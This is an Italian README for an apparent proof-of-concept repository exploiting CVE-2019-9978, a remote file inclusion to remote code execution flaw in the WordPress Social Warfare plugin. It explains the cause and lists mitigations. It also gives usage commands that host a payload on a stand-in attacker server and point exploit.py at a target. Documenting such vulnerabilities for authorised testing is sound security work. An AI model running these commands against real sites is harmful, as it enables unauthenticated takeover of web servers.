
Un proof-of-concept Python personalizzato che mostra l'analisi delle cause profonde e lo sfruttamento di CVE 2019-9978 (plugin Social Warfare), concentrandosi sul flusso pratico dell'attacco RFI verso RCE.
Questo repository contiene un Proof of Concept (PoC) basato su Python che dimostra lo sfruttamento di CVE-2019-9978, una vulnerabilità critica nel plugin Social Warfare per WordPress.
La vulnerabilità consente a un attaccante non autenticato di effettuare Remote File Inclusion (RFI), che può essere elevata a Remote Code Execution (RCE) ospitando un payload malevolo su un server controllato dall'attaccante.
Questo PoC è stato sviluppato e testato in un ambiente di laboratorio WordPress controllato esclusivamente a scopo educativo e di test di sicurezza autorizzati.
Il plugin Social Warfare non riesce a convalidare e sanificare correttamente l'input fornito dall'utente utilizzato per l'inclusione di contenuti remoti.
Di conseguenza, un attaccante può fornire un URL esterno malevolo, portando a un'inclusione remota di file non autenticata.
Quando il file remoto incluso contiene codice PHP eseguibile, viene eseguito nel contesto del server WordPress, risultando in esecuzione remota di codice.
Richiesta HTTP non autenticata
↓
Remote File Inclusion (URL esterno)
↓
Esecuzione del Payload Malevolo
↓
Remote Code Execution (RCE)
python3 -m http.server 8000
Posizionare il file payload (es. payload-main.txt) nella directory del server.
python3 exploit.py <target-site.com> http://attacker-ip:8000/payload-main.txt
Aggiornare il plugin Social Warfare a una versione patchata
Disabilitare l'inclusione remota di file:
allow_url_include = Off
Limitare la gestione degli URL esterni nei plugin WordPress
Implementare un Web Application Firewall (WAF) con regole di rilevamento RFI
Questo progetto è destinato esclusivamente a scopi educativi e test di sicurezza autorizzati.
NON utilizzare questo Proof of Concept contro sistemi senza autorizzazione esplicita. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.